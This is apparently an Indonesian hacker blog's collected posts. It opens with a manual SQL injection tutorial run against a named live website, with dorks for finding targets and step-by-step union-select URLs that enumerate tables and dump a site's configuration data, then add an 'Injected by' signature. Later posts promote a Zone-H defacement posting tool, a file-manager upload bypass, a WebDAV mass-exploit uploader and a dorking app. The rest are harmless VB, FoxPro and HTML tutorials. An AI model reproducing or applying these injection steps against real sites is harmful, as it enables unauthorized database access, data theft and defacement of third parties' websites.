Tutorial SQLI Manual



Assalamualaikum sobat IT ,,
alhamdulilla yah akhirnya kita ketemu lagi dengan saya ,,
kali ini saya akan berbagi teknik yah cukup terkenal lah dikalangan para underground
mereka biasa menyebutnya Proff sejuta Umat ,, ya tidak lain yaitu Sql injection dimana seseorang dapat menyisipkan perintah perintah sql ke paramater url sehingga dapat memanipulasi database target tersebut..
hanya saja saya kali ini yang versi manualnya dan yang paling dasar ..
langsung saja yu ke TKP ...

pertama jika kalian ingin menggunakan dork ,, gunakan dork
misal ..
inurl:/index.php?id=
inurl:/berita.php?tampil=
yang penting ada parameter yang jelas nya ..

selanjutnya jika sudah mendapatkan target kita akan melakukan order by  yaitu berguna untuk mengetahui jumlah table yang ada di database... :v

untuk live target saya yaitu :
http://www.jobperformance.dk/page.php?id=48

cara mengecek vuln nya dengan menambahkan tanda (') di belakang angka
contoh :
http://www.jobperformance.dk/page.php?id='48


nahh error berarti vuln

selanjutnya kita akan coba lakukan order by ..
liat gamabar

caranya order dengan menambahkan satu angka dibelakang terus sampai menemukan error

http://www.jobperformance.dk/page.php?id=48+order+by+1--
http://www.jobperformance.dk/page.php?id=48+order+by+2--
http://www.jobperformance.dk/page.php?id=48+order+by+3--
http://www.jobperformance.dk/page.php?id=48+order+by+4--
terusss ,,,
dan ..
http://www.jobperformance.dk/page.php?id=48+order+by+12--

yap ,, saya mendapatkan error di order by 12
berarti sudah dipastikan tablenya ada 11 buah ,,
jumlah table = order error -1 aja :v

selanjutnya kita akan mencari Magic number :v
yahh angka magic , begitulah para injektor menyebutnya :'v
caranya dengan melakukan -48+union+select+1,2,3,4,5,6,7,8,9,10,11-- (sesuai jumlah table)
sama seperti yang dilakukan order by tadi ,, hanya pake tanda "-" didepan angka
http://www.jobperformance.dk/page.php?id=-48+union+select+1,2,3,4,5,6,7,8,9,10,11--
dan apa yang terjadi ?


muncul angka "9" pemirsa :VV
nah jadi diantara angka 8 dan 10 disanalah yang nantinya akan kita masukan perintah perintah selanjutnya ,, dan angka 9 nanti akan dihilangkan ..
kita akan mencoba melihat Versi database yang dipakai oleh web tersebut :v
caranya dengan menambahkan "version()" atau "@@version". diletakan di posisi magicnum tadi
dan kita bisa melihat nama database dengan perintah "database()" atau "@@database" ..
ex:
http://www.jobperformance.dk/page.php?id=-48+union+select+1,2,3,4,5,6,7,8,database(),10,11--
http://www.jobperformance.dk/page.php?id=-48+union+select+1,2,3,4,5,6,7,8,version(),10,11--



nah disana kita telah mengetahui versi dan nama databasenya ..
v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.

Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.
ex :
http://www.jobperformance.dk/page.php?id=-48+union+select+1,2,3,4,5,6,7,8,group_concat(table_name),10,11+from+information_schema.tables+where+table_schema=database()--

Nahh kita sudah mengetahui table table yang ada di database web tersebut ..
kita menemukan ada beberapa table yaitu :
cms2_backup,cms2_lang,cms2_news,cms2_options,cms2_pages,cms2_subscribers,cms2_ws_art,cms2_ws_cats
loh ko ada 8 yah ? :V Wallohualam sob harusnya kan 11 :VV

apa yang dilakukan selanjutnya ?? yah kita mencari username dan password ,,
kira kira ditable mana ya sob ? :v ane bingung nih .. :'v
okeh yang mana aja deh kita akan coba di table cms2_options
yaitu dengan menggunakan perintah
“group_concat(column_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --.
pada langkah ini kita harus mengconvert string nama table ke Decimal dulu atau ASCII Value 
gunakan toolnya disini.
nah hasil convetnya adalah (99 109 115 50 95 111 112 116 105 111 110 115 ) pisah kan dengan "," disetiap angka yang terpisah..
lalu masukan ke dalam CHAR(99, 109, 115, 50, 95, 111, 112, 116, 105, 111, 110, 115)
nah seperti itu ..
jadi :
http://www.jobperformance.dk/page.php?id=-48+union+select+1,2,3,4,5,6,7,8,group_concat(column_name),10,11+from+information_schema.columns+where+table_name=CHAR(99,%20109,%20115,%2050,%2095,%20111,%20112,%20116,%20105,%20111,%20110,%20115)--


wealah ko yang muncul malah kek ginian :'v bukan username password ,,
yang muncul adalah : lang_show_type,site_url,site_name,site_description,site_keywords,email_admin_url,g_analytics,c_email,c_person,c_name,c_address,c_zip,c_city,c_phone,c_fax,c_cvr,c_bank,c_bank_regno,c_bank_acount,c_map_url,news_num_show,sitemap,crumbs,print,tip,newsletter,news,ticker,rss,search,gallery,guestbook,webshop

tapi yowes lah gak papa pada dasarnya sama aja cara mengambil table dan kolom intinya ..
disana kita menemukan beberapa kolom atau biasa disebut "field" pada database kita akan coba melihat isi dari semua collum tersebut..
gunakan perintah group_concat(namafield,0x3a,namafield,0x3a,namafiled) . letakan 0x3a disetiap batas field
0x3a adalah hasil convert dari ":" ke Hexa
dan diakhiri dengan +from+cms2_options-- .. nahh cms2_options itu adalah nama table dari kolom tersebut..
jadi :
http://www.jobperformance.dk/page.php?id=-48+union+select+1,2,3,4,5,6,7,8,group_concat(lang_show_type,0x3a,site_url,0x3a,site_name,0x3a,site_description,0x3a,site_keywords,0x3a,email_admin_url,0x3a,g_analytics,0x3a,c_email,0x3a,c_person,0x3a,c_name,0x3a,c_address,0x3a,c_zip,0x3a,c_city,0x3a,c_phone,0x3a,c_fax,0x3a,c_cvr,0x3a,c_bank,0x3a,c_bank_regno,0x3a,c_bank_acount,0x3a,c_map_url,0x3a,news_num_show,0x3a,sitemap,0x3a,crumbs,0x3a,print,0x3a,tip,0x3a,newsletter,0x3a,news,0x3a,ticker,0x3a,rss,0x3a,search,0x3a,gallery,0x3a,guestbook,0x3a,webshop),10,11+from+cms2_options--


tinggal print Leet name kita caranya dengan mengkonvert dulu String kita misal "Injected by Peluru Kertas" ke hex ... di http://string-functions.com/string-hex.aspx
kemudian memakai 0x didepannya jadi nya
0x496e6a65637465642062792050656c757275204b6572746173
letakan didalam group_concat atau concat
jadi:
http://www.jobperformance.dk/page.php?id=-48+union+select+1,2,3,4,5,6,7,8,group_concat(0x496e6a65637465642062792050656c757275204b6572746173,lang_show_type,0x3a,site_url,0x3a,site_name,0x3a,site_description,0x3a,site_keywords,0x3a,email_admin_url,0x3a,g_analytics,0x3a,c_email,0x3a,c_person,0x3a,c_name,0x3a,c_address,0x3a,c_zip,0x3a,c_city,0x3a,c_phone,0x3a,c_fax,0x3a,c_cvr,0x3a,c_bank,0x3a,c_bank_regno,0x3a,c_bank_acount,0x3a,c_map_url,0x3a,news_num_show,0x3a,sitemap,0x3a,crumbs,0x3a,print,0x3a,tip,0x3a,newsletter,0x3a,news,0x3a,ticker,0x3a,rss,0x3a,search,0x3a,gallery,0x3a,guestbook,0x3a,webshop),10,11+from+cms2_options--

yahh kalian bisa mengembangkan variasi variasinya ,,,
sebenarnya masih banyak teknik teknik SQL Injection dan ini hanya sebagian kecil dari semuanya..
kita akan bertemu lagi dilain waktu dengan teknik2 lainnya tentunya
ini hanya permulaan..
sampai jumpa lagi semoga bermanfaat :D

Responsive FileManager Bypass Extension







Assalamualakum warohmatullohi wabarokatu ...
Hallo sobat IT kali ini saya akan share lagi nih mengenai webvuln ^_^
Vulnerability pada tool Responsive FileManager  yaitu dengan cara mengubah ekstensi filenya ^_^
oh iya berhubung domain .com blog ini telah mati mohon bantuannya ya teman teman buat up lagi visitornya ^_^
okeh langsung saja yuk ke TKP>>

[Source] Video Converted With Visual Basic .Net


Assalamualaikum warrohmatullohi wabarakatu ..
Apa kabar soba IT ^_^ ..
ya kali ini saya akan share video converted dengan vb.net .
saya dapatkan sourcenya dari website code project dan saya share lagi untuk menjelaskan kegunaannya .
Tool ini berguna bagi agan agan yang mau mengconvert size , ekstensi video .
Silahkan kembangkan lagi source ini supaya lebih greget lagi dengan menambahkan berbagai fitur dan kegunaanya ^_^
yo langsung saja deh nih gan link donglodnya


ZH Poster Peluru Kertas






Assalamualaikum waroohmatullohi wabarokatu ,,
Hallo sobat IT , kali ini saya akan share tool bikinan saya lagi nih hehe :D
"ZH Poster Peluru Kertas "
lumayan greget lah untuk setingkat saya seorang newbie :D
programnya cukup sederhana genk , tapi lumayan sangat membatu dalam aktifitas posting zone h untuk list yang banyak dan tidak perlu cape2 copas copas tinggal load target dan ok :D hehe
banyak kekurangan maupun kelebihnannya

untuk kelebihan :
Sangat cepat dalam memposting (jika internet lancar)
efisien

untuk kekurangan :
tidak ada result hanya ada log  (jadi harus cek sendiri ke onhold / archives apakah tersubmit atau tidak)

tapi meski begitu tool ini sangan membantu sekali genk untuk saya :D
untuk penggunaannya kita liat yuk cuplikan video dibawah ini :



Download tool : http://ouo.io/Bo379U [Update V1]

Source Mini Webdav Upload VB6



Assalamualaikum warrohmatullohi wabarokatu
Halo sobat IT , kali ini saya akan berbagi source "Mini Webdav Upload" dengan visual basic 6
dapat source dari codeproject saya ubah2 lagi sedikit hehe :)
ya sesuai banyaknya pesanan source akhirnya saya share source ini juga, lumayan buat pembelajaran
Memang projectnya saya sederhana supaya dapat dikembangkan lagi oleh kalian lagi hehe :D
Penggunaanya gampang tinggal pilih file maka langsung mengupload sendiri filenya
Mau dibikin mass upload atau apapun terserah silahkan kembangkan lagi :D seperti halnya saya mencoba mengembangkannya menjadi mass exploiter webdav hanya saja saya memakai VB.NET tetapi tidak ada bedanya fungsinya masih sama

penampakan :




Langsung saja deh download dan share ke temen2 projectnya supaya bermanfaat :) see you
semoga bermanfaat :

http://ouo.io/6PI43 source minidav
http://ouo.io/Cjx3sn7 aplikasi minidav

Source CRUD VB 6.0 Database MySQL


Hallo soba IT sudah lama nih mimin gak update update,,
kali ini mimin ada request nih minta source CRUD visual basic pake database MySQL .
kalo ditempat lain sih biasanya error error ya kalo dimari dijamin deh kecil kemungkinannya error karena mimin gak suka copas dan asal mosting ,, mimin suka bikin dan coba sendiri.

Kalo mau source ini minimal udah taulah dikit2 apa itu MySql , apa itu database , APA ITU VISUAL BASIC,, pake aplikasi Xampp aja deh tuh udah kumplit nyediain fitur2nya sql , apache ,ftp .
Langsung aja deh yuk cekidot ,, download dulu bahannya.

http://ouo.io/20douO ODBC Konektor
http://ouo.io/0q2dyO Project VB CRUD nya

Hal pertama dilakukan adalah import Databasenya dulu ke MySql





Nah selanjutnya buka ODBC konektor yang udah kalian download tadi itu
klik add untuk menambahkan configurasi ODBC baru >>
pilih MYSQL ODBC 5.3 ANSI DRIVER , klik finish
lalu sesuaikan configurasinya seperti dibawah ini
tinggal test aja deh sampai bener2 konek ,,
kalo udah gituh tinggal coba aja projectnya jalan apa enggak ..

Kalo punya ane jalan nih gan :
Kalo ada error biasanya pada komponen vb nya hapus aja terus ganti yang baru
misalnya Command1 nya hapus terus bikin lagi yang baru terus sesuain Namenya sama yang tadi
ngerti ? :v
Lebih Giat Lagi Belajar ! :v haha
see you again letter ..




Tutorial Membuat MsgBox Pertanyaan Di VB 6.0 dan VB.NET


assalamuaikum warrohmstullahi wabarakatu ..
salam sobat IT semua kali ini saya share tentang
"Bagaimana cara Membuat MsgBox Pertanyaan Di VB 6.0 dan VB.NET"
yaitu menambahkan perintah pada result klik msgbox , kali ini saya akan menambahkan perintah "End" pada result ok vbmsgbox nya

Nah seperti gambar diatas ,, ketika kita mengklik Ok maka form akan menutup programnya karena saya sisipkan perintah untuk keluar di msgbox resultnya ,, kita mulai di VB 6.0 dulu yuk gan cekidot

1. Siapkan satu buah form dan satu buah command button
setelah itu masukan coding dibawah ini


Spoiler for script

VB Code:
Private Sub Command1_Click()
Dim keluars As VbMsgBoxResult
keluars = MsgBox("Yakin mau keluar ?", vbQuestion + vbOKCancel, "Keluar?")
If keluars = vbOK Then
End
End If
End Sub


   perhatikan gambar diatas  , kemudian coba run project nya
VB 6.0 Selesai ... selanjutnya kita coba di VB.Net

1. Langkah pertama sama kita siapkan satu buah form dan 1 buah button

Masukan coding diwabah ini kedalam project code nya


Spoiler for script

VB Code:
Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
Dim keluar As MsgBoxResult
keluar = MsgBox("Yakin mau keluar ?", vbQuestion + vbOKCancel, "Keluar?")
If keluar = MsgBoxResult.Ok Then
Close()
End If

End Sub


perhatikan gambarnya coba ,,

Coba jalankan programnya :


Yapp sudah selsesai dua duanya ,, :) sekian tutorial dari saya :D sekian gan semoga bermanfaat :)

E Book Membuat Program CRUD Di Foxpro 6.0



Assalamualaikum warrohmatullohi wabarokatu sobat IT ,,
E book saya kali ini akan menjelaskan nih langkah langkah untuk membuat program CRUD dengan foxpro ,, sebelumnya udah tau gak gan apa itu CRUD ? CRUD yaitu Creat Read Update Delete ,,
Kenggulan membuat program CRUD difoxpro adalah kita tanpa susah2 menambahkan coding / syntax yang rumit rumit , bahkan tidak perlu menambahkan syntax juga bisa . langsung saja gan download aja E - Booknya biar bisa dipelajari offline :

Semoga bermanfaat ^_^

http://ouo.io/w0ziR
kalo dipassword passwordnya : peluru

Membuat Aplikasi CRUD Dengan Javascript dan HTML



Assalamualaikum warrohmatullahi wabarakatu .
Hallo sobat IT kali ini saya share script JavaScript lagi nih :3
kali ini tentang
 "CRUD Dengan Javascript dan HTML"
yap ! yaitu program Create Read Update Delete hanya dengan javascript dan html ,,
loh lalu databasenya dimana ??
Untuk database sendiri menggunakan Cookie pada webbrowser atau pada PC  , masih kurang efisien memang . Tapi lumayan buat nambah2 ilmu gan hehe :3
kurang lebih penampakannya seperti ini gan :


Langsung saja deh sedot nih gan :



Tutorial Membuat Kalkulator Dengan HTA dan JavaScript



Assalamualaikum warohmatullohi wabarokatu Sobat IT :D
ketemu lagi nih sama gue mimin Peluru Kertas :D ,, kali ini gue mau share HTA sama javascript nih
"Tutorial Membuat Kalkulator Dengan HTA dan JavaScript"

sebelumnya sudah tau gak gan HTA itu apa ? :D mending sebelum lanjut baca dulu deh gak nih artikel Loker Ilmu IT yang satu ini :) :

Klik

Setelah itu simak deh spoiler script dibawah ini :


Spoiler for script

Kalkulator Code:

<hta:application
showintaksbar=10
caption=10
/>
<html>
<body>
<title>Kalkulator</title>
<SCRIPT LANGUAGE="JavaScript">
 function addChar(input, character) {
 if(input.value == null || input.value == "0")
 input.value = character
 else
 input.value += character
 }

 function cos(form) {
 form.display.value = Math.cos(form.display.value);
 }

 function sin(form) {
 form.display.value = Math.sin(form.display.value);
 }

 function tan(form) {
 form.display.value = Math.tan(form.display.value);
 }

 function sqrt(form) {
 form.display.value = Math.sqrt(form.display.value);
 }

 function ln(form) {
 form.display.value = Math.log(form.display.value);
 }

 function exp(form) {
 form.display.value = Math.exp(form.display.value);
 }

 function deleteChar(input) {
 input.value = input.value.substring(0, input.value.length - 1)
 }

 function changeSign(input) {
 if(input.value.substring(0, 1) == "-")
 input.value = input.value.substring(1, input.value.length)
 else
 input.value = "-" + input.value
 }

 function compute(form) {
 form.display.value = eval(form.display.value)
 }

 function square(form) {
 form.display.value = eval(form.display.value) * eval(form.display.value)
 }

 function checkNum(str) {
 for (var i = 0; i< str.length; i++) {
 var ch = str.substring(i, i+1)
 if (ch < "0" || ch >"9") {
 if (ch != "/" && ch != "*" && ch != "+" && ch != "-" && ch != "."
 && ch != "(" && ch!= ")") {
 alert("invalid entry!")
 return false
 }
 }
 }
 return true
 }
</SCRIPT>

<FORM NAME="sci-calc">
<TABLE CELLSPACING="0" CELLPADDING="1">
<TR>
<TD COLSPAN="5" ALIGN="center">
<INPUT NAME="display" VALUE="0" SIZE="28" MAXLENGTH="25">
</TD>
</TR>
<TR>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" exp " ONCLICK="if (checkNum(this.form.display.value)) { exp(this.form) }">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" 7 " ONCLICK="addChar(this.form.display, '7')">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" 8 " ONCLICK="addChar(this.form.display, '8')">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" 9 " ONCLICK="addChar(this.form.display, '9')">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" / " ONCLICK="addChar(this.form.display, '/')">
</TD>
</TR>
<TR>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" ln " ONCLICK="if (checkNum(this.form.display.value)) { ln(this.form) }">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" 4 " ONCLICK="addChar(this.form.display, '4')">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" 5 " ONCLICK="addChar(this.form.display, '5')">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" 6 " ONCLICK="addChar(this.form.display, '6')">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" * " ONCLICK="addChar(this.form.display, '*')">
</TD>
</TR>
<TR>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" sqrt " ONCLICK="if (checkNum(this.form.display.value)) { sqrt(this.form) }">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" 1 " ONCLICK="addChar(this.form.display, '1')">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" 2 " ONCLICK="addChar(this.form.display, '2')">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" 3 " ONCLICK="addChar(this.form.display, '3')">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" - " ONCLICK="addChar(this.form.display, '-')">
</TD>
</TR>
<TR>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" sq " ONCLICK="if (checkNum(this.form.display.value)) { square(this.form) }">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" 0 " ONCLICK="addChar(this.form.display, '0')">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" . " ONCLICK="addChar(this.form.display, '.')">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" +/- " ONCLICK="changeSign(this.form.display)">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" + " ONCLICK="addChar(this.form.display, '+')">
</TD>
</TR>
<TR>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" ( " ONCLICK="addChar(this.form.display, '(')">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE="cos" ONCLICK="if (checkNum(this.form.display.value)) { cos(this.form) }">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" sin" ONCLICK="if (checkNum(this.form.display.value)) { sin(this.form) }">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" tan" ONCLICK="if (checkNum(this.form.display.value)) { tan(this.form) }">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE=" ) " ONCLICK="addChar(this.form.display, ')')">
</TD>
</TR>
<TR>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE="clear" ONCLICK="this.form.display.value = 0 ">
</TD>
<TD ALIGN="center" COLSPAN="3">
<INPUT TYPE="button" VALUE="backspace" ONCLICK="deleteChar(this.form.display)">
</TD>
<TD ALIGN="center">
<INPUT TYPE="button" VALUE="enter" NAME="enter" ONCLICK="if (checkNum(this.form.display.value)) { compute(this.form) }">
</TD>
</TR>
</TABLE>
</FORM>
</body>
</html>



Nah buka spoiler diatas gan ,, copy pasti script nya dinotepad simpan dengan nama kalkulator.hta
kurang lebih penampakannya seperti ini gan nanti :


Yahh cukup menarik sih gan karena tidak memerlukan aplikasi pendukung yang memberatkan cukup dengan notepad saja dan kita sudah bisa membuat aplikasi dekstop sendiri.
Semoga bermanfaat gan (y) 

Source CRUD Dengan Visual Basic .NET & MS.Access


Assalamualaikum warohmatullohi wabarokatu ,,
Kali ini saya akan share source kode CRUD visual basic .NET dan MS.Access
sebelumnya apakan kamu tau apa itu C.R.U.D ?
CRUD adalah singkatan dari CREAT READ UPDATE DELETE
yappp program CRUD adalah program untuk menulis membaca merubah dan menghapus sebuah data dalam database , dan database yang saya gunakan kali ini menggunakan MS.Access .. semua database pada dasarnya sama memiliki table , filed , dan primary key . Jika kamu sudah mengetahui tentang system data mempelajari CRUD pasti akan lebih mudah dilakukan .
Kenapa saya hanya share source nya saja ? kenapa tidak dengan tutorial membuatnya juga ?
Itu karena untuk tutorialnya membutuhkan kata kata yang harus sesuai dengan yang anda inginkan dan untuk membuat tutorialnya saya rasa akan panjang hingga membuat part part untuk tutorial.
Untuk itu saya hanya share sourcenya saja untuk anda pelajari sendiri
karena ini sangat sederhana dan hanya menggunakan dua field saja .
langsung saja deh nihh gan yang butuh source kodenya sedott ..



Download GJ Simulation Untuk Eliminasi Gauss Jordan



Assalamualaikun warohmatullohi wabarokatu ,
Ya kali ini saya akan share sebuah aplikasi yang untuk menyelesaikan sistem persamaan linear metode eliminasi gauss jordan
ya sering kali guru memberikan kita soal yang sangant sulit dan begitu banyak penyelesaiannya sehingga membuat kita menjadi frustasi ,,
Tapi jangan khawatir , dengan aplikasi GJ Simulation ini kamu dapat mengerjakan soal dengan mudah dan juga kamu dapat mempelajari mater materi tengtang persamaan linear..

Kita lihat saja yuk cuplikannya dibawah ini,,

Kali ini saya akan mencoba menyelesaikan soal 4x4 Ordo
yuk cekibrot
pertama buka gj simulationnya :




Kemudian klik Aplikasi > maka akan tampil seperti ini :
Pilih berapa ordo yang ingin kamuu coba ,, saya coba 4 ordo biar lebih greget:


Coba input angka manual > setelah itu akan tampil hasilnya berapa , Klik tampilan Penyelesaianya untuk melihat cara menyelesaikan Soalnya :

 Langusng saja yuk ah downlaod aja nih aplikasinya cekibrot :



Program Menghitung Nilai Dengan FoxPro


Assalamualaikun warohmatullohi wabarakatu..
yo sobat IT kali ini saya akan share tutorial membuat program nilai dengan foxpro
tadi dikampus belajar ini jadi keingetan dahh ,, tapi sama yang dikampus beda ko dari syntaxnya juga , jadi mohon maaf ini tidak copas dari kampus .. hanya sama saja programnya.

FoxPro masih berkerabat dengan Visual Basic karena itu sytaxnya pun tak jauh berbeda ,,
kalo menurut saya sih lebih enakkan visual basic , tapi ini hanya sebatas pengenalan saja kepada agan agan yang belum tau ..
Yu langsung aja cekitdot.

pertama kita buka dulu aplikasi foxpro nya
kemudian new project > new form



nah perhatikan langkah langkah gambar diatas ,,
setelah tampil form ,, kemudian siapkan 7 BUAH TEXTBOX , 7 BUAH LABEL, 2 BUAH COMMAND BUTON
atur seperti tampilan dibawah ini :




Kemudian klik pada tombol proses / button 1 , masukan syntax dibawah ini :

rata = (val(thisform.Text2.value)+val(thisform.text3.value)+val(thisform.text4.value))/3
thisform.text5.value = int(rata)
if rata >= 60 then
hasil = "lulus"
else
hasil = "tidak lulus"
endif
thisform.text7.value = hasil
total = (val(thisform.Text2.value)+val(thisform.text3.value)+val(thisform.text4.value))
thisform.text6.value = int(total)

lihat gambar :




setelah itu klik double pada tombol Keluar / comman buton 2 ,, masukan syntax dibawah ini :

thisform.release()
Lihat gambar :

Kemudian jalankan ,, klik yang tanda seru pada toolbar , atau ke menu Form > Run Form :


Nahh cukup mudah bukan ,, syntax nya emang agak sedikit mirip VB sih ,,
semoga bermanfaat

Download Aplikasi Google Dorking By Peluru Kertas

Assalamualaikum warohmatullohi wabarakatu ..
Salam sobat IT dimanapun kau berada
sudah lama nih saya gak ngeshare ngeshare lagi ,,, berhubung sekarang lagi seneng senengnya ngulik ngulik lagi nih jadi kepikiran buat bikin nih aplikasi ,

"Aplikasi Google Dorking By Peluru Kertas"

ya aplikasi ini sih memang sudah ada bikinan orang lain pun tapi apa salahnya tetap share terus bikinan sendiri ya gay :v haha
sederhana sih kurang lebih penampakannya seperti ini geng


tinggal masukin aja dorknya lalu klik dorking otomatis web2 yang ke find bakal muncul,,
lalu kalian dapat menyimpan hasil dorkingnya , tinggal ke menu file >> save dork list


ya cukup gampang lah penggunaanya
langsung sedot deh nih sobat IT